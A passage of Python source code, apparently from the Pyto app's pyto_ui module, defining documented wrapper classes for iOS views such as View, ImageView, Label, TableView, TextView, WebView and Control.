def size(self, new_value: Tuple[float, float]):
self.width, self.height = new_value
@property
def origin(self) -> Tuple[float, float]:
"""
A point that specifies the coordinates of the view's rectangle’s origin.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.x, self.y)
@origin.setter
def origin(self, new_value: Tuple[float, float]):
self.x, self.y = new_value
@property
def frame(self) -> Tuple[float, float, float, float]:
"""
The frame rectangle, which describes the view’s location and size in its superview’s coordinate system.
This value is a tuple with X, Y, Width and Height values.
:rtype: Tuple[float, float, float, float]
"""
return (self.x, self.y, self.width, self.height)
@frame.setter
def frame(self, new_value: Tuple[float, float, float, float]):
self.x, self.y, self.width, self.height = new_value
@property
def __flexible_width__(self) -> bool:
return self.__py_view__.flexibleWidth
@__flexible_width__.setter
def __flexible_width__(self, new_value: bool):
self.__py_view__.flexibleWidth = new_value
@property
def __flexible_height__(self) -> bool:
return self.__py_view__.flexibleHeight
@__flexible_height__.setter
def __flexible_height__(self, new_value: bool):
self.__py_view__.flexibleHeight = new_value
@property
def __flexible_left_margin__(self) -> bool:
return self.__py_view__.flexibleLeftMargin
@__flexible_left_margin__.setter
def __flexible_left_margin__(self, new_value: bool):
self.__py_view__.flexibleLeftMargin = new_value
@property
def __flexible_right_margin__(self) -> bool:
return self.__py_view__.flexibleRightMargin
@__flexible_right_margin__.setter
def __flexible_right_margin__(self, new_value: bool):
self.__py_view__.flexibleRightMargin = new_value
@property
def __flexible_top_margin__(self) -> bool:
return self.__py_view__.flexibleTopMargin
@__flexible_top_margin__.setter
def __flexible_top_margin__(self, new_value: bool):
self.__py_view__.flexibleTopMargin = new_value
@property
def __flexible_bottom_margin__(self) -> bool:
return self.__py_view__.flexibleBottomMargin
@__flexible_bottom_margin__.setter
def __flexible_bottom_margin__(self, new_value: bool):
self.__py_view__.flexibleBottomMargin = new_value
@property
def flex(self) -> List[AUTO_RESIZING]:
"""
A list that determines how the receiver resizes itself when its superview’s bounds change. See `Auto Resizing <constants.html#auto-resizing>`_ constants for possible values.
:rtype: List[`Auto Resizing <constants.html#auto-resizing>`_]
"""
a = []
if self.__flexible_width__:
a.append(FLEXIBLE_WIDTH)
if self.__flexible_height__:
a.append(FLEXIBLE_HEIGHT)
if self.__flexible_bottom_margin__:
a.append(FLEXIBLE_BOTTOM_MARGIN)
if self.__flexible_top_margin__:
a.append(FLEXIBLE_TOP_MARGIN)
if self.__flexible_left_margin__:
a.append(FLEXIBLE_LEFT_MARGIN)
if self.__flexible_right_margin__:
a.append(FLEXIBLE_RIGHT_MARGIN)
return a
@flex.setter
def flex(self, new_value: List[AUTO_RESIZING]):
self.__flexible_width__, self.__flexible_height__, self.__flexible_top_margin__, self.__flexible_bottom_margin__, self.__flexible_left_margin__, self.__flexible_right_margin__ = (
(FLEXIBLE_WIDTH in new_value),
(FLEXIBLE_HEIGHT in new_value),
(FLEXIBLE_TOP_MARGIN in new_value),
(FLEXIBLE_BOTTOM_MARGIN in new_value),
(FLEXIBLE_LEFT_MARGIN in new_value),
(FLEXIBLE_RIGHT_MARGIN in new_value),
)
def subview_with_name(self, name) -> View:
"""
Returns the subview with the given name.
Raises ``NameError`` if no view is found.
:rtype: View
"""
for view in self.subviews:
if view.name == name:
return view
raise NameError(f"No subview named '{name}'")
@property
def subviews(self) -> List[View]:
"""
(Read Only) A list of the view's children.
See also :func:`~pyto_ui.View.add_subview`.
:rtype: List[View]
"""
views = self.__py_view__.subviews
if views is None or len(views) == 0:
return []
else:
_views = []
for view in views:
ui = sys.modules["pyto_ui"]
_class = getattr(ui, str(view.objc_class.pythonName))
_view = _class()
_view.__py_view__ = view
_views.append(_view)
return _views
@property
def superview(self) -> View:
"""
(Read Only) The parent view containg the receiver view.
:rtype: View
"""
superview = self.__py_view__.superView
if superview is None:
return None
else:
ui = sys.modules["pyto_ui"]
_class = getattr(ui, str(superview.objc_class.pythonName))
view = _class()
view.__py_view__ = superview
return view
@property
def background_color(self) -> Color:
"""
The background color of the view.
:rtype: Color
"""
c = self.__py_view__.backgroundColor
if c is None:
return None
else:
return Color(c)
@background_color.setter
def background_color(self, new_value: Color):
if new_value is None:
self.__py_view__.backgroundColor = None
else:
self.__py_view__.backgroundColor = new_value.__py_color__
@property
def hidden(self) -> bool:
"""
A boolean indicating whether the view is visible or not.
:rtype: bool
"""
return self.__py_view__.hidden
@hidden.setter
def hidden(self, new_value: bool):
self.__py_view__.hidden = new_value
@property
def alpha(self) -> float:
"""
The opacity of the view.
:rtype: float
"""
return self.__py_view__.alpha
@alpha.setter
def alpha(self, new_value: float):
self.__py_view__.alpha = new_value
@property
def opaque(self) -> bool:
"""
A boolean indicating whether the view is opaque or not. Setting to ``True`` should prevent the view from having a transparent background.
:rtype: bool
"""
return self.__py_view__.opaque
@opaque.setter
def opaque(self, new_value: bool):
self.__py_view__.opaque = new_value
@property
def tint_color(self) -> Color:
"""
The tint color of the view. If set to ``None``, the tint color will be inherited from the superview. The tint color affects some views like ``Button`` for title color, ``TextView`` for cursor color, etc.
:rtype: Color
"""
c = self.__py_view__.tintColor
if c is None:
return None
else:
return Color(c)
@tint_color.setter
def tint_color(self, new_value: Color):
if new_value is None:
self.__py_view__.tintColor = None
else:
self.__py_view__.tintColor = new_value.__py_color__
@property
def user_interaction_enabled(self) -> bool:
"""
A boolean indicating whether the view responds to touches.
:rtype: bool
"""
return self.__py_view__.userInteractionEnabled
@user_interaction_enabled.setter
def user_interaction_enabled(self, new_value: bool):
self.__py_view__.userInteractionEnabled = new_value
@property
def clips_to_bounds(self) -> bool:
"""
A boolean value that determines whether subviews are confined to the bounds of the view.
:rtype: bool
"""
return self.__py_view__.clipsToBounds
@clips_to_bounds.setter
def clips_to_bounds(self, new_value: bool):
self.__py_view__.clipsToBounds = new_value
@property
def corner_radius(self) -> float:
"""
The radius to use when drawing rounded corners for the view’s background.
:rtype: float
"""
return self.__py_view__.cornerRadius
@corner_radius.setter
def corner_radius(self, new_value: float):
self.__py_view__.cornerRadius = new_value
@property
def border_width(self) -> float:
"""
The width of the view's border.
:rtype: float
"""
return self.__py_view__.borderWidth
@border_width.setter
def border_width(self, new_value: float):
self.__py_view__.borderWidth = new_value
@property
def border_color(self) -> Color:
"""
The color of the view's border
:rtype: Color
"""
c = self.__py_view__.borderColor
if c is None:
return None
else:
return Color(c)
@border_color.setter
def border_color(self, new_value: Color):
if new_value is None:
self.__py_view__.borderColor = None
else:
self.__py_view__.borderColor = new_value.__py_color__
@property
def content_mode(self) -> CONTENT_MODE:
"""
A flag used to determine how a view lays out its content when its bounds change.
See `Content Mode` <constants.html#content-mode>`_ constants for possible values.
:rtype: `Content Mode` <constants.html#content-mode>`_
"""
return self.__py_view__.contentMode
@content_mode.setter
def content_mode(self, new_value: CONTENT_MODE):
self.__py_view__.contentMode = new_value
@property
def appearance(self) -> APPEARANCE:
"""
The appearance of the view.
See `Appearance <constants.html#appearance>`_ constants for possible values.
:rtype: `Appearance <constants.html#appearance>`_
"""
return self.__py_view__.appearance
@appearance.setter
def appearance(self, new_value: APPEARANCE):
self.__py_view__.appearance = new_value
@property
def first_responder(self) -> bool:
"""
(Read Only) A boolean indicating the view is first responder.
``UIKit`` dispatches some types of events, such as motion events, to the first responder initially.
:rtype: bool
"""
return self.__py_view__.firstResponder
def add_subview(self, view: View):
"""
Adds the given view to the receiver's hierarchy.
:param view: The view to add.
"""
self.__py_view__.addSubview(view.__py_view__)
def insert_subview(self, view: View, index: int):
"""
Inserts the given view to the receiver's hierarchy at the given index.
:param view: The view to insert.
:param index: The index where the view should be inserted.
"""
self.__py_view__.insertSubview(view.__py_view__, at=index)
def insert_subview_bellow(self, view: View, bellow_view: View):
"""
Inserts the given view to the receiver's hierarchy bellow another given view.
:param view: The view to insert.
:param bellow_view: The view above the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, bellow=bellow_view.__py_view__)
def insert_subview_above(self, view: View, above_view: View):
"""
Inserts the given view to the receiver's hierarchy above another given view.
:param view: The view to insert.
:param above_view: The view bellow the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, above=above_view.__py_view__)
def remove_from_superview(self):
"""
Removes the view from the parent's hierarchy.
"""
self.__py_view__.removeFromSuperview()
def add_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Adds a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be added.
"""
self.__py_view__.addGestureRecognizer(gesture_recognizer.__py_gesture__)
def remove_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Removes a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be removed.
"""
self.__py_view__.removeGestureRecognizer(gesture_recognizer.__py_gesture__)
@property
def gesture_recognizers(self) -> List[GestureRecognizer]:
"""
(Read Only) Returns all gesture recognizers.
See :meth:`~pyto_ui.View.add_gesture_recognizer`.
:rtype: List[GestureRecognizer]
"""
recognizers = self.__py_view__.gestureRecognizers
if recognizers is None or len(recognizers) == 0:
return []
else:
_recognizers = []
for recognizer in recognizers:
_recognizer = GestureRecognizer(GESTURE_TYPE_TAP)
_recognizer.__py_gesture__ = recognizer
_recognizers.append(_recognizer)
return _recognizers
def size_to_fit(self):
"""
Sizes the view to fit its content.
"""
self.__py_view__.sizeToFit()
def become_first_responder(self) -> bool:
"""
Becomes the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be shown.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.becomeFirstResponder()
def resign_first_responder(self) -> bool:
"""
Stops being the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be hidden.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.resignFirstResponder()
@property
def layout(self) -> Callable[[View], None]:
"""
A function called when the view is resized. Takes the view as parameter.
:rtype: Callable[[View], None]
"""
action = self.__py_view__.layoutAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@layout.setter
def layout(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.layoutAction = None
else:
self.__py_view__.layoutAction = _values.value(new_value)
@property
def button_items(self) -> List[ButtonItem]:
"""
A list of :class:`~pyto_ui.ButtonItem` objects to be displayed on the top bar. Works only if the view is the root view presented with :func:`~pyto_ui.show_view` or :meth:`~pyto_ui.View.push`.
:rtype: List[ButtonItem]
"""
items = self.__py_view__.buttonItems
if items is None or len(items) == 0:
return []
else:
_items = []
for item in items:
_item = ButtonItem()
_item.managed = item
_items.append(_item)
return _items
@button_items.setter
def button_items(self, new_value: List[ButtonItem]):
items = []
if new_value is not None and len(new_value) > 0:
for item in new_value:
items.append(item.__py_item__)
self.__py_view__.buttonItems = items
class ImageView(View):
"""
A view displaying an image. The displayed image can be a ``PIL`` image, an ``UIKit`` ``UIImage`` (see :func:`~pyto_ui.image_with_system_name`) or can be directly downloaded from an URL.
"""
def __init__(self, image: "Image" = None, url: str = None):
self.__py_view__ = __UIImageView__.newView()
self.image = image
if url is not None:
self.load_from_url(url)
@property
def image(self) -> "Image":
"""
The image displayed on screen. Can be a ``PIL`` image or an ``UIKit`` ``UIImage``. See :func:`~pyto_ui.image_with_system_name` for more information about how to get a symbol image.
:rtype: Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_view__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
def load_from_url(self, url):
"""
Loads and display the image at given url.
:param url: The URL of the image.
"""
def _set_image(self, url):
from PIL import Image
self.image = Image.open(urlopen(url))
Thread(target=_set_image, args=(self, url)).start()
class Label(View):
"""
A view displaying not editable and not selectable text.
"""
def __init__(self, text: str = ""):
self.__py_view__ = __PyLabel__.newView()
self.text = text
def load_html(self, html):
"""
Loads HTML in the Label.
:param html: The HTML code to load.
"""
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text to be displayed on the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def text_color(self) -> Color:
"""
The color of the text.
:rtype: Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The text's alignment. For possible values, see `Text Alignment <constants.html#text-alignment>`_ constants.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def line_break_mode(self) -> LINE_BREAK_MODE:
"""
The line break mode.
:rtype: `Line Break Mode <constants.html#line-break-mode>`_
"""
return self.__py_view__.lineBreakMode
@line_break_mode.setter
def line_break_mode(self, new_value: LINE_BREAK_MODE):
self.__py_view__.lineBreakMode = new_value
@property
def adjusts_font_size_to_fit_width(self) -> bool:
"""
A boolean indicating whether the label adjusts its font size to fit its size.
:rtype: bool
"""
return self.__py_view__.adjustsFontSizeToFitWidth
@adjusts_font_size_to_fit_width.setter
def adjusts_font_size_to_fit_width(self, new_value: bool):
self.__py_view__.adjustsFontSizeToFitWidth = new_value
@property
def allows_default_tightening_for_truncation(self) -> bool:
return self.__py_view__.allowsDefaultTighteningForTruncation
@allows_default_tightening_for_truncation.setter
def allows_default_tightening_for_truncation(self, new_value: bool):
self.__py_view__.allowsDefaultTighteningForTruncation = new_value
@property
def number_of_lines(self) -> int:
"""
The numbers of lines displayed in the label. Set to ``0`` to show all the text.
:rtype: int
"""
return self.__py_view__.numberOfLines
@number_of_lines.setter
def number_of_lines(self, new_value: int):
self.__py_view__.numberOfLines = new_value
class TableViewCell(View):
"""
A cell contained in a :class:`~pyto_ui.TableView`.
Can have a title, a subtitle, an image and an accessory view.
For a list of supported style, see `Table View Cell Style <constants.html#table-view-cell-style>`_ constants.
"""
def __init__(
self, style: TABLE_VIEW_STYLE = __v__("TABLE_VIEW_CELL_STYLE_DEFAULT")
):
if style == "TABLE_VIEW_CELL_STYLE_DEFAULT":
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(
TABLE_VIEW_CELL_STYLE_DEFAULT
)
else:
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
@property
def movable(self) -> bool:
"""
A boolean indicating whether the cell is movable. If set to ``True``, the container :class:`TableViewSection` object should handle the move.
:rtype: bool
"""
return self.__py_view__.movable
@movable.setter
def movable(self, new_value: bool):
self.__py_view__.movable = new_value
@property
def removable(self) -> bool:
"""
A boolean indicating the cell is removable. If set to ``True``, the container :class:`TableViewSection` object should handle the removal.
:rtype: bool
"""
return self.__py_view__.removable
@removable.setter
def removable(self, new_value: bool):
self.__py_view__.removable = new_value
@property
def content_view(self) -> View:
"""
(Read Only) The view contained in the cell. Custom views should be added inside it.
:rtype: View
"""
_view = View()
_view.__py_view__ = self.__py_view__.contentView
return _view
@property
def image_view(self) -> ImageView:
"""
(Read Only) The view containing an image. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: Image View
"""
view = self.__py_view__.imageView
if view is None:
return None
else:
_view = ImageView()
_view.__py_view__ = view
return _view
@property
def text_label(self) -> Label:
"""
(Read Only) The label containing the main text of the cell.
:rtype: Label
"""
view = self.__py_view__.textLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
return _view
@property
def detail_text_label(self) -> Label:
"""
(Read Only) The label containing secondary text. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: Label
"""
view = self.__py_view__.detailLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
return _view
@property
def accessory_type(self) -> ACCESSORY_TYPE:
"""
The type of accessory view placed to the right of the cell. See `Accessory Type <constants.html#accessory_type>`_ constants for possible values.
:rtype: `Accessory Type <constants.html#accessory_type>`_.
"""
return self.__py_view__.accessoryType
@accessory_type.setter
def accessory_type(self, new_value: ACCESSORY_TYPE):
self.__py_view__.accessoryType = new_value
class TableView(View):
"""
A view containing a list of cells.
A Table View has a list of :class:`TableViewSection` objects that represent groups of cells. A Table View has two possible styles. See `Table View Style <constants.html#table-view-style>`_.
"""
def __init__(
self,
style: TABLE_VIEW_STYLE = __v__("TABLE_VIEW_STYLE_PLAIN"),
sections: List[TableViewSection] = [],
):
if style == "TABLE_VIEW_STYLE_PLAIN":
self.__py_view__ = __PyTableView__.newViewWithStyle(TABLE_VIEW_STYLE_PLAIN)
else:
self.__py_view__ = __PyTableView__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
self.sections = sections
@property
def reload_action(self) -> Callable[TableView, None]:
"""
A function called when the button item is pressed. Takes the button item as parameter.
:rtype: Callable[[TableView], None]
"""
action = self.__py_view__.reloadAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@reload_action.setter
def reload_action(self, new_value: Callable[[TableView], None]):
if new_value is None:
self.__py_view__.action = None
else:
self.__py_view__.reloadAction = _values.value(new_value)
@property
def edit_button_item(self) -> ButtonItem:
"""
Returns a bar button item that toggles its title and associated state between Edit and Done.
The button item is setup to edit the Table View.
:rtype: ButtonItem
"""
item = ButtonItem()
item.__py_item__ = self.__py_view__.editButtonItem
return item
@property
def sections(self) -> List[TableViewSection]:
"""
A list of :class:`TableViewSection` containg cells to be displayed on the Table View.
Setting a new value will reload automatically the contents of the Table View.
:rtype: List[TableViewSection]
"""
sections = self.__py_view__.sections
py_sections = []
for section in sections:
py_section = TableViewSection("", [])
py_section.__py_section__ = section
py_sections.append(py_section)
return py_sections
@sections.setter
def sections(self, new_value: List[TableViewSection]):
sections = []
for section in new_value:
section.__py_section__.tableView = self.__py_view__
sections.append(section.__py_section__)
self.__py_view__.sections = sections
def deselect_row(self):
"""
Deselects the current selected row.
"""
self.__py_view__.deselectRowAnimated(True)
class TextView(View):
"""
An editable, multiline and scrollable view containing text.
"""
def __init__(self, text=""):
self.__py_view__ = __PyTextView__.newView()
self.__py_view__.managedValue = _values.value(self)
self.text = text
@property
def selected_range(self) -> Tuple[int, int]:
"""
Returns the selected text range. A tuple of two integers (start, end).
:rtype: Tuple[int, int]
"""
return (int(self.__py_view__.range[0]), int(self.__py_view__.range[1]))
@property
def did_begin_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View begins editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View ends editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def did_change(self) -> Callable[[TextView], None]:
"""
A function called when the Text View's text changes. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didChangeText
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_change.setter
def did_change(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didChangeText = None
else:
self.__py_view__.didChangeText = _values.value(new_value)
def load_html(self, html):
"""
Loads HTML in the Text View.
:param html: The HTML code to load.
"""
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text contained in the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def editable(self) -> bool:
"""
A boolean indicating whether the text is editable.
:rtype: bool
"""
return self.__py_view__.editable
@editable.setter
def editable(self, new_value: bool):
self.__py_view__.editable = new_value
@property
def selectable(self) -> bool:
"""
A boolean indicating whether the text is selectable.
:rtype: bool
"""
return self.__py_view__.selectable
@selectable.setter
def selectable(self, new_value: bool):
self.__py_view__.selectable = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing th text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
if "widget" not in os.environ:
class WebView(View):
"""
A View that displays web content.
"""
class JavaScriptException(Exception):
"""
An excpetion while running JavaScript code. Raised by :meth:`~pyto_ui.WebView.evaluate_js`.
"""
pass
def __init__(self, url: str = None):
self.__py_view__ = __PyWebView__.newView()
self.__py_view__.managedValue = _values.value(self)
if url is not None:
self.load_url(url)
def evaluate_js(self, code) -> str:
"""
Runs JavaScript code and returns a String representation of the evaluation result. Raises a :class:`~pyto_ui.WebView.JavaScriptException`.
:param code: JavaScript code to run.
:rtype: str
"""
result = self.__py_view__.evaluateJavaScript(code)
if result is None:
return None
else:
result = str(result)
if result.startswith("_VALULE_:"):
return result.replace("_VALULE_:", "", 1)
elif result.endswith("_ERROR_:"):
raise self.__class__.JavaScriptException(
result.replace("_ERROR_:", "", 1)
)
def load_url(self, url: str):
"""
Loads an URL.
:param url: The URL to laod. Can be 'http://', 'https://' or 'file://'.
"""
self.__py_view__.loadURL(url)
def load_html(self, html: str, base_url: str = None):
"""
Loads an HTML string.
:param html: The HTML code to load.
:param base_url: An optional URL used to resolve relative paths.
"""
baseURL = base_url
if baseURL is not None:
baseURL = str(base_url)
self.__py_view__.loadHTML(html, baseURL=baseURL)
def reload(self):
"""
Reloads the Web View.
"""
self.__py_view__.reload()
def stop(self):
"""
Stops loading content.
"""
self.__py_view__.stop()
def go_back(self):
"""
Goes back.
"""
self.__py_view__.goBack()
def go_forward(self):
"""
Goes forward.
"""
self.__py_view__.goForward()
@property
def can_go_back(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_back` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoBack
@property
def can_go_forward(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_forward` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoForward
@property
def is_loading(self) -> bool:
"""
(Read Only) A boolean indicating whether the Web View is loading content.
:rtype: bool
"""
return self.__py_view__.isLoading
@property
def url(self) -> str:
"""
(Read Only) The current URL loaded into the Web View.
:rtype: str
"""
url = self.__py_view__.url
if url is None:
return None
else:
return str(url)
@property
def did_start_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View starts loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didStartLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_start_loading.setter
def did_start_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didStartLoading = None
else:
self.__py_view__.didStartLoading = _values.value(new_value)
@property
def did_finish_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View finished loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didFinishLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_finish_loading.setter
def did_finish_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didFinishLoading = None
else:
self.__py_view__.didFinishLoading = _values.value(new_value)
@property
def did_fail_loading(self) -> Callable[[WebView, str], None]:
"""
A function called when the Web View failed to load contents. Takes the sender Web View and a string describing the error as parameters.
:rtype: Callable[[WebView, str], None]
"""
action = self.__py_view__.didFailLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_fail_loading.setter
def did_fail_loading(self, new_value: Callable[[WebView, str], None]):
if new_value is None:
self.__py_view__.didFailLoading = None
else:
self.__py_view__.didFailLoading = _values.value(new_value)
##################
# MARK: - Control Classes
##################
class Control(View):
"""
The base class for controls, which are visual elements that convey a specific action or intention in response to user interactions.
Inherited by :class:`Button`, :class:`SegmentedControl`, :class:`Slider`, :class:`Switch` and :class:`TextField`
"""
def __init__(self):
self.__py_view__ = __PyControl__.newView()
self.__py_view__.managedValue = _values.value(self)
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the control is enabled.
:rtype: bool
"""
return self.__py_view__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_view__.enabled = new_value
@property
def horizontal_alignment(self) -> HORZONTAL_ALIGNMENT:
"""
The horizontal alignment of the view's contents. See `Horizontal Alignment <constants.html#horizontal-alignment>`_ constants for possible values.
:rtype: `Horizontal Alignment <constants.html#horizontal-alignment>`_
"""
return self.__py_view__.contentHorizontalAlignment
@horizontal_alignment.setter
def horizontal_alignment(self, new_value: HORZONTAL_ALIGNMENT):
self.__py_view__.contentHorizontalAlignment = new_value
@property
def vertical_alignment(self) -> VERTICAL_ALIGNMENT:
"""
The vertical alignment of the view's contents. See `Vertical Alignemnt <constants.html#vertical-alignment>`_ constants for possible values.
:rtype: `Vertical Alignment <constants.html#vertical-alignment>`_
"""
return self.__py_view__.contentVerticalAlignment
@vertical_alignment.setter
def vertical_alignment(self, new_value: VERTICAL_ALIGNMENT):
self.__py_view__.contentVerticalAlignment = new_value
@property
def action(self) -> Callable[[Control], None]:
"""
A function called when the control triggers its action.
For example, a :class:`Button` object calls this function when it's pressed.
Takes the :class:`Control` object as parameter.
:rtype: Callable[[Control], None]
"""
action = self.__py_view__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[Control], None]):
if new_value is None:
self.__py_view__.action = None
else:
self.__py_view__.action = _values.value(new_value)
class SegmentedControl(Control):
"""
A horizontal control made of multiple segments, each segment functioning as a discrete button.
The function passed to :data:`~pyto_ui.Control.action` will be called when the segmented control changes its selection.
"""
def __init__(self, segments: List[str] = []):
self.__py_view__ = __PySegmentedControl__.newView()
